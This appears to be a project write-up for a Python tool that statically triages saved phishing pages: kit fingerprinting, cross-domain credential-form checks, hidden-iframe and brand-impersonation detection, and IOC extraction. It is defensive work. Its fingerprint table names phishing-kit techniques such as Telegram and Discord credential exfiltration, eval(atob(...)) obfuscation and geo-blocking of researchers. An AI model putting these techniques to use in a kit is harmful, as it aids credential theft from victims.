Python · Threat Intelligence

PhishKit Analyzer — Static triage for phishing HTML artifacts

A static analysis tool that fingerprints phishing kits, identifies credential harvesting forms, detects brand impersonation, and extracts blocklist-ready IOCs from a saved HTML file

python phishing threat-intel reverse-engineering web-security

← Back to projects

PhishKit Analyzer

Static triage for phishing HTML artifacts — finds kit fingerprints, credential harvesting forms, and embedded IOCs without ever loading the page in a browser.

The Goal

When a phishing report lands — a forwarded page, a suspicious URL from a user, a sample pulled from a threat feed — I want three things answered fast:

Is this from a known kit, or hand-rolled?
Where do the credentials actually go?
What URLs, IPs, and domains do I need to block right now?

Most tools in this space want to execute the page, spin up a browser, or require a full sandbox. That's overkill for triage, and it creates its own risk. PhishKit Analyzer is designed to be the five-minute pass: give it a saved HTML file, get back a scored report and a list of IOCs.

How It Works

The analyzer parses the raw HTML through BeautifulSoup and runs a series of independent detection passes over the document tree and the raw text. Each pass produces zero or more RiskFactor records, each carrying a name, a severity weight, and a human-readable detail string. The final score is the sum of all matched weights, capped at 100.

The analysis pipeline:

Kit fingerprint matching — regex patterns scanned against the raw HTML string
Credential form detection — finds <form> tags with password inputs, then checks whether the form action POSTs credentials cross-domain
Hidden iframe detection — inspects <iframe> elements for display:none, visibility:hidden, or pixel-sized dimensions
Brand impersonation check — compares the page <title> against a list of major brands; flags when the title references a brand the page domain doesn't contain
IOC extraction — regex sweeps for all URLs, IPv4 addresses, and domains in the document

The tool defaults to operating on local files. Fetching a live URL requires an explicit --fetch flag per invocation — phishing pages can drop payloads even on programmatic fetches, so the safe default is to refuse.

What It Extracts

Kit fingerprints — patterns drawn from publicly documented kits:

Fingerprint	What it catches
`16shop_marker`	Literal kit string from 16shop campaigns
`16shop_path`	Common 16shop admin PHP paths
`telegram_exfil`	Telegram bot API credential exfil endpoint
`discord_webhook`	Discord webhook credential exfil
`antibot_marker`	Anti-bot JS function bundled with many kits
`blocked_country_check`	Geo-block config strings used to evade researcher IPs
`obfuscated_eval`	`eval(atob(...))` and similar decode-and-execute patterns
`redirect_to_legit`	Post-capture redirect to a real brand domain

Credential form signals — whether a password form is present, and whether credentials are being POSTed to an external host rather than the page's own domain.

Hidden iframes — cloaking technique used to load tracker or exfil frames invisibly.

Brand impersonation — page title says "Microsoft — Account Sign In" but the domain is login-verify-microsoft-account.tld.

IOCs — all URLs, IPv4 addresses, and domains deduplicated and sorted, ready to paste into a SIEM or blocklist.

The output is available as a human-readable terminal report or structured JSON for piping into a SOAR pipeline.

Tech & Tools

Python 3.10+
BeautifulSoup 4 — HTML parsing and DOM traversal
re — raw-text regex passes for kit fingerprints and IOC extraction
urllib.parse — domain extraction from form actions and page URLs
python-whois (optional) — flags freshly registered domains on request
pyproject.toml packaging — installable as phishkit CLI entry point

The architecture is intentionally flat: analyzer.py holds the core logic as pure functions that take a string and return dataclasses. The CLI in cli.py handles I/O, flag parsing, and output formatting separately, which made unit testing straightforward — every detection function can be tested in isolation with a crafted HTML string.

What I Learned

On phishing kits specifically: Real kits are lazier than I expected. The 16shop and Telegram-exfil patterns are nearly verbatim strings left in the HTML — operators copy-paste kits without removing obvious markers. That makes static detection surprisingly reliable for known kits, even without executing any JavaScript.

On the cross-domain POST signal: A credential form that POSTs to a different host than the page it's on is almost never legitimate. Legitimate login forms post to the same domain or a known subdomain. When the action host diverges, it's either a kit's collection endpoint or a forwarding service. That single check adds more signal than I anticipated.

On safe analysis: The decision to make --fetch an explicit per-invocation opt-in rather than a flag you set once was deliberate. Phishing pages occasionally include drive-by payloads that fire on any HTTP client, not just browsers. Making the safe behavior the default removes a footgun that would otherwise be easy to forget.

On parsing HTML you don't control: Phishing HTML is often malformed — broken tags, mismatched quotes, partial DOM trees from kit assembly errors. BeautifulSoup's error tolerance was essential; a strict parser would have missed real signals because the surrounding markup was broken.

On IOC extraction: A naive URL regex matches too aggressively — it pulls in image paths, CSS references, and CDN URLs that aren't useful IOCs. Filtering out well-known asset extensions and the page's own domain as a post-processing step dramatically reduced noise in the output.